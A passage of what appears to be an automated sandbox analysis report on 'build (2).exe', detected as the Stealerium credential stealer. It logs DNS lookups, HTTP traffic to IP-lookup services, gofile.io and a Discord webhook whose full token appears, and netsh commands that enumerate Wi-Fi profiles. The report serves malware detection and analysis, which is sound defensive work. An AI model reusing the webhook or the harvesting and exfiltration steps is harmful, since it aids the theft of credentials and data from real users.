Jun 21, 2022 14:51:16.150466919 CEST	64316	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:51:16.173616886 CEST	53	64316	8.8.8.8	192.168.2.4
Jun 21, 2022 14:51:16.513257980 CEST	50778	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:51:16.535710096 CEST	53	50778	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 21, 2022 14:49:16.344219923 CEST	192.168.2.4	8.8.8.8	0x9c2d	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:17.640181065 CEST	192.168.2.4	8.8.8.8	0xf7d9	Standard query (0)	canary.discord.com	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:34.097254038 CEST	192.168.2.4	8.8.8.8	0xe236	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:34.342349052 CEST	192.168.2.4	8.8.8.8	0x82e6	Standard query (0)	220.240.8.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Jun 21, 2022 14:51:08.786809921 CEST	192.168.2.4	8.8.8.8	0x25a6	Standard query (0)	apiv2.gofile.io	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:08.824876070 CEST	192.168.2.4	8.8.8.8	0xdfd3	Standard query (0)	apiv2.gofile.io	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:15.505135059 CEST	192.168.2.4	8.8.8.8	0x321c	Standard query (0)	store2.gofile.io	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:15.983131886 CEST	192.168.2.4	8.8.8.8	0x3633	Standard query (0)	220.240.8.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Jun 21, 2022 14:51:16.026577950 CEST	192.168.2.4	8.8.8.8	0x5474	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.150466919 CEST	192.168.2.4	8.8.8.8	0x8618	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.513257980 CEST	192.168.2.4	8.8.8.8	0xb8d0	Standard query (0)	canary.discord.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 21, 2022 14:49:16.373553038 CEST	8.8.8.8	192.168.2.4	0x9c2d	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:17.663284063 CEST	8.8.8.8	192.168.2.4	0xf7d9	No error (0)	canary.discord.com		162.159.136.232	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:17.663284063 CEST	8.8.8.8	192.168.2.4	0xf7d9	No error (0)	canary.discord.com		162.159.137.232	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:17.663284063 CEST	8.8.8.8	192.168.2.4	0xf7d9	No error (0)	canary.discord.com		162.159.138.232	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:17.663284063 CEST	8.8.8.8	192.168.2.4	0xf7d9	No error (0)	canary.discord.com		162.159.135.232	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:17.663284063 CEST	8.8.8.8	192.168.2.4	0xf7d9	No error (0)	canary.discord.com		162.159.128.233	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:34.118717909 CEST	8.8.8.8	192.168.2.4	0xe236	No error (0)	icanhazip.com		104.18.115.97	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:34.118717909 CEST	8.8.8.8	192.168.2.4	0xe236	No error (0)	icanhazip.com		104.18.114.97	A (IP address)	IN (0x0001)
Jun 21, 2022 14:49:34.363188028 CEST	8.8.8.8	192.168.2.4	0x82e6	Name error (3)	220.240.8.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Jun 21, 2022 14:51:08.817276001 CEST	8.8.8.8	192.168.2.4	0x25a6	No error (0)	apiv2.gofile.io	gofile.io		CNAME (Canonical name)	IN (0x0001)
Jun 21, 2022 14:51:08.817276001 CEST	8.8.8.8	192.168.2.4	0x25a6	No error (0)	gofile.io		151.80.29.83	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:08.817276001 CEST	8.8.8.8	192.168.2.4	0x25a6	No error (0)	gofile.io		51.178.66.33	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:08.817276001 CEST	8.8.8.8	192.168.2.4	0x25a6	No error (0)	gofile.io		51.38.43.18	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:08.857049942 CEST	8.8.8.8	192.168.2.4	0xdfd3	No error (0)	apiv2.gofile.io	gofile.io		CNAME (Canonical name)	IN (0x0001)
Jun 21, 2022 14:51:08.857049942 CEST	8.8.8.8	192.168.2.4	0xdfd3	No error (0)	gofile.io		51.38.43.18	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:08.857049942 CEST	8.8.8.8	192.168.2.4	0xdfd3	No error (0)	gofile.io		151.80.29.83	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:08.857049942 CEST	8.8.8.8	192.168.2.4	0xdfd3	No error (0)	gofile.io		51.178.66.33	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:15.524329901 CEST	8.8.8.8	192.168.2.4	0x321c	No error (0)	store2.gofile.io		31.14.70.243	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.002511024 CEST	8.8.8.8	192.168.2.4	0x3633	Name error (3)	220.240.8.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Jun 21, 2022 14:51:16.046427965 CEST	8.8.8.8	192.168.2.4	0x5474	No error (0)	icanhazip.com		104.18.115.97	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.046427965 CEST	8.8.8.8	192.168.2.4	0x5474	No error (0)	icanhazip.com		104.18.114.97	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.173616886 CEST	8.8.8.8	192.168.2.4	0x8618	No error (0)	api.mylnikov.org		104.21.9.139	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.173616886 CEST	8.8.8.8	192.168.2.4	0x8618	No error (0)	api.mylnikov.org		172.67.160.130	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.535710096 CEST	8.8.8.8	192.168.2.4	0xb8d0	No error (0)	canary.discord.com		162.159.128.233	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.535710096 CEST	8.8.8.8	192.168.2.4	0xb8d0	No error (0)	canary.discord.com		162.159.136.232	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.535710096 CEST	8.8.8.8	192.168.2.4	0xb8d0	No error (0)	canary.discord.com		162.159.138.232	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.535710096 CEST	8.8.8.8	192.168.2.4	0xb8d0	No error (0)	canary.discord.com		162.159.135.232	A (IP address)	IN (0x0001)
Jun 21, 2022 14:51:16.535710096 CEST	8.8.8.8	192.168.2.4	0xb8d0	No error (0)	canary.discord.com		162.159.137.232	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

canary.discord.com

apiv2.gofile.io

ip-api.com

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49757	162.159.136.232	443	C:\Users\user\Desktop\build (2).exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49806	151.80.29.83	443	C:\Users\user\Desktop\build (2).exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49756	208.95.112.1	80	C:\Users\user\Desktop\build (2).exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 14:49:16.430543900 CEST	1147	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jun 21, 2022 14:49:16.489288092 CEST	1147	IN	HTTP/1.1 200 OK Date: Tue, 21 Jun 2022 12:49:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true
Jun 21, 2022 14:49:35.120369911 CEST	1156	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com
Jun 21, 2022 14:49:35.150897980 CEST	1157	IN	HTTP/1.1 200 OK Date: Tue, 21 Jun 2022 12:49:34 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 41 X-Rl: 43 Data Raw: 74 72 75 65 0a Data Ascii: true

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49758	104.18.115.97	80	C:\Users\user\Desktop\build (2).exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 14:49:34.187495947 CEST	1155	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jun 21, 2022 14:49:34.244321108 CEST	1156	IN	HTTP/1.1 200 OK Date: Tue, 21 Jun 2022 12:49:34 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=v_2PjBp0S0WdGVC1SUCI7Z2aDTNYM.pXiP0JusQS594-1655815774-0-AT/o8qHx51MRAMHwSvS1hzpk+9J9KV9e45bR/MQIKrqdyT5wxaRkcCPBd60MVIU7OscvrD1D5yc56klEcCmkcRw=; path=/; expires=Tue, 21-Jun-22 13:19:34 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 71ecdd6cbeba9137-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 33 0a Data Ascii: 102.129.143.53
Jun 21, 2022 14:51:05.833832979 CEST	7631	OUT	GET / HTTP/1.1 Host: icanhazip.com
Jun 21, 2022 14:51:05.859699965 CEST	7632	IN	HTTP/1.1 200 OK Date: Tue, 21 Jun 2022 12:51:05 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=HZ4vi4m_1kVLNjA7.OBVu4UjaMXI3g84myXFRfKfZDk-1655815865-0-ASzmd7nbBwWeIVDTbwmQPH25FhBAK+4j9royOdBfrXyogCW/AFdSH44NEnfSJeCy679JngLG/9N8S9gwiMQIEKY=; path=/; expires=Tue, 21-Jun-22 13:21:05 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 71ecdfa97ec59137-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 33 0a Data Ascii: 102.129.143.53

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49826	104.18.115.97	80	C:\Users\user\Desktop\build (2).exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 14:51:16.066304922 CEST	8364	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jun 21, 2022 14:51:16.099504948 CEST	8402	IN	HTTP/1.1 200 OK Date: Tue, 21 Jun 2022 12:51:16 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=UW4z.BTkeSpd9ZWPkbhHKQStsUeqtbyrvN1xDR6S.1U-1655815876-0-AY6XMTHhBx8IZmgI+yovn8Y73LPzdLSL+V4ac3GnHke0qsAKkThz0IGnuBli6oxNoB9iYvQ9U1MfTN30z0Zz5WA=; path=/; expires=Tue, 21-Jun-22 13:21:16 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 71ecdfe96d96901c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 33 0a Data Ascii: 102.129.143.53

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49757	162.159.136.232	443	C:\Users\user\Desktop\build (2).exe

Timestamp	kBytes transferred	Direction	Data
2022-06-21 12:49:20 UTC	0	OUT	GET /api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wllkm5eEvJRRHZgq09CglFP4ccIwK3 HTTP/1.1 Host: canary.discord.com Connection: Keep-Alive
2022-06-21 12:49:20 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 21 Jun 2022 12:49:20 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close CF-Ray: 71ecdd16fc5f5caa-FRA Set-Cookie: __dcfduid=91b944a8f16011ec83dcb27fe4016b33; Expires=Sun, 20-Jun-2027 12:49:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Via: 1.1 google CF-Cache-Status: DYNAMIC Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Content-Type-Options: nosniff x-envoy-upstream-service-time: 14 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M9uuWFAAFEK7y3ZQ%2FsEZQKd1s5sfPzrtdJyS1xJOX9zQph6596gDvlBn%2FCA8aPvu3mDVB0I6aFoIbFekPoz3glarTGj7jfdz8bZ3mHbn2XmUqRznyXhjeI2cM3wRpHeWV9u04Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: __sdcfduid=91b944a8f16011ec83dcb27fe4016b3315a8b065de03a6c62980ba2ac0a9d52a82059f2c25a22d0f951a20abfd43bbe7; Expires=Sun, 20-Jun-2027 12:49:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=1140bbe7ad7201ec7516494c394fa2cb445133f3-1655815760; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare
2022-06-21 12:49:20 UTC	1	IN	Data Raw: 66 65 0d 0a 7b 22 74 79 70 65 22 3a 20 31 2c 20 22 69 64 22 3a 20 22 39 38 38 36 39 37 34 31 32 39 36 33 30 Data Ascii: fe{"type": 1, "id": "9886974129630
2022-06-21 12:49:20 UTC	1	IN	Data Raw: 31 36 37 32 34 22 2c 20 22 6e 61 6d 65 22 3a 20 22 43 61 70 74 61 69 6e 20 48 6f 6f 6b 22 2c 20 22 61 76 61 74 61 72 22 3a 20 6e 75 6c 6c 2c 20 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 20 22 39 38 38 36 39 37 33 39 35 37 38 33 31 36 38 30 31 33 22 2c 20 22 67 75 69 6c 64 5f 69 64 22 3a 20 22 39 38 38 36 39 37 33 39 35 37 38 33 31 36 38 30 31 30 22 2c 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 22 3a 20 6e 75 6c 6c 2c 20 22 74 6f 6b 65 6e 22 3a 20 22 43 41 73 67 34 58 77 66 41 34 6a 46 4b 67 79 73 75 50 6f 6e 77 4f 47 65 58 75 63 4c 73 38 30 31 79 43 44 56 72 38 57 6c 6c 6b 6d 35 65 45 76 4a 52 52 48 5a 67 71 30 39 43 67 6c 46 50 34 63 63 49 77 4b 33 22 7d 0d 0a Data Ascii: 16724", "name": "Captain Hook", "avatar": null, "channel_id": "988697395783168013", "guild_id": "988697395783168010", "application_id": null, "token": "CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wllkm5eEvJRRHZgq09CglFP4ccIwK3"}
2022-06-21 12:49:20 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49806	151.80.29.83	443	C:\Users\user\Desktop\build (2).exe

Timestamp	kBytes transferred	Direction	Data
2022-06-21 12:51:08 UTC	1	OUT	GET /getServer HTTP/1.1 Host: apiv2.gofile.io Connection: Keep-Alive
2022-06-21 12:51:09 UTC	1	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD Access-Control-Allow-Origin: * Content-Length: 42 Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Content-Type: application/json; charset=utf-8 Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Date: Tue, 21 Jun 2022 12:51:09 GMT Etag: W/"2a-qze0I4VG4WMz9DjTvOuu19HSgRg" Expect-Ct: max-age=0 Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Xss-Protection: 0 Connection: close
2022-06-21 12:51:09 UTC	2	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 22 3a 22 73 74 6f 72 65 32 22 7d 7d Data Ascii: {"status":"ok","data":{"server":"store2"}}

Target ID:	0
Start time:	14:49:07
Start date:	21/06/2022
Path:	C:\Users\user\Desktop\build (2).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\build (2).exe"
Imagebase:	0x130000
File size:	1569792 bytes
MD5 hash:	7565784C6E2CCA725B1CDD88200186FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Target ID:	11
Start time:	14:49:31
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x1190000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	14:49:33
Start date:	21/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	14
Start time:	14:49:33
Start date:	21/06/2022
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff66f380000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	15
Start time:	14:49:33
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xba0000
File size:	12800 bytes
MD5 hash:	561054CF9C4B2897E80D7E7D9027FED9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	16
Start time:	14:49:34
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x13a0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	17
Start time:	14:49:35
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x30000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	18
Start time:	14:49:36
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x1190000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	20
Start time:	14:49:40
Start date:	21/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	21
Start time:	14:49:40
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xba0000
File size:	12800 bytes
MD5 hash:	561054CF9C4B2897E80D7E7D9027FED9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	22
Start time:	14:49:41
Start date:	21/06/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x13a0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	20.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.8%
Total number of Nodes:	16
Total number of Limit Nodes:	0

Executed Functions

Function 00A64740 Relevance: 6.9, Strings: 5, Instructions: 665COMMON

Download Yara Rule

Strings

A, xrefs: 00A649B7
E, xrefs: 00A649CB
U, xrefs: 00A64C10
T, xrefs: 00A64C1D
, xrefs: 00A64ABB

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID: $A$E$T$U
API String ID: 0-1503325869
Opcode ID: 925455aee4459d847a1e731397ccedb610de4f9e190e6a5f233e7dd0d2123614
Instruction ID: 65d3d5c7363878c9e1984cd970508aa29570ab9ede214081c49b92734d3b4a22
Opcode Fuzzy Hash: 925455aee4459d847a1e731397ccedb610de4f9e190e6a5f233e7dd0d2123614
Instruction Fuzzy Hash: EE320531E042448FEB15DBA8C885BEEBBB2BF8A304F19C169D1456F386DB319C85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A638E8 Relevance: 4.4, Strings: 3, Instructions: 679
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K, xrefs: 00A6398B
c, xrefs: 00A63C23
., xrefs: 00A63A43

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID: .$K$c
API String ID: 0-3458198900
Opcode ID: c6f6305200e622871d10753746e9b344b7af696c1ce0d51ff8f4f248e4ec98f6
Instruction ID: 6ac21b98d1bd7d7f2db6001db6ccbf96ab1c7357afc6b2264d21b1a3347571ca
Opcode Fuzzy Hash: c6f6305200e622871d10753746e9b344b7af696c1ce0d51ff8f4f248e4ec98f6
Instruction Fuzzy Hash: DF52C031A006558FDB14CF68CC80BA9BBB2FF96304F2885A9D5499B346D730ED85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A638D7 Relevance: 4.2, Strings: 3, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K, xrefs: 00A6398B
c, xrefs: 00A63BEA
., xrefs: 00A63A43

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID: .$K$c
API String ID: 0-3458198900
Opcode ID: 489ec1d2061e64e5956b371f0410c00d0c1a62f201c84ca32ccbd70aed11e75a
Instruction ID: 1ab0c1b74a52e38791d4c9c249992697bcadb24aa0fa91364053e64a928dca49
Opcode Fuzzy Hash: 489ec1d2061e64e5956b371f0410c00d0c1a62f201c84ca32ccbd70aed11e75a
Instruction Fuzzy Hash: B402AE31A046558FDB18CF68C884BADFBB2BF96300F2885A9D5469B352D734ED81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C516 Relevance: 3.6, Strings: 2, Instructions: 1053COMMON

Download Yara Rule

Strings

-, xrefs: 00A6C965
., xrefs: 00A6C97D

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID: -$.
API String ID: 0-3807043784
Opcode ID: 0872e59f7745440cc0c03f3b087bda8650083d7588a6758ffc9140126d9227ad
Instruction ID: f479de7fec89d844dba852d09ecb44b2730abb721d07fbb8446de5e82a43b24c
Opcode Fuzzy Hash: 0872e59f7745440cc0c03f3b087bda8650083d7588a6758ffc9140126d9227ad
Instruction Fuzzy Hash: 56A26F70A046658BDB25CF28CC85BEDB7B2FF59314F1881A5D84A9B346D730AD85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A68418 Relevance: 2.1, Strings: 1, Instructions: 850COMMON

Download Yara Rule

Strings

, xrefs: 00A684B8

Memory Dump Source

Source File: 00000000.00000002.525376092.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_build (2).jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 871ae3ea652db10e6f1539a89d67e46a08a4fc6f00bd8fc2fb50b4ff59b31b8e
Instruction ID: a3359249ac4282c2235f8488cd51fe7f9416573156d5bf27e0711c8d1548095e
Opcode Fuzzy Hash: 871ae3ea652db10e6f1539a89d67e46a08a4fc6f00bd8fc2fb50b4ff59b31b8e
Instruction Fuzzy Hash: FC728B31600B16CFC724CF29C584BAAB7F5FF48304F148A2AD59A97655CB38F886CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B1076C Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 04B114E7

Memory Dump Source

Source File: 00000000.00000002.530825016.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_build (2).jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
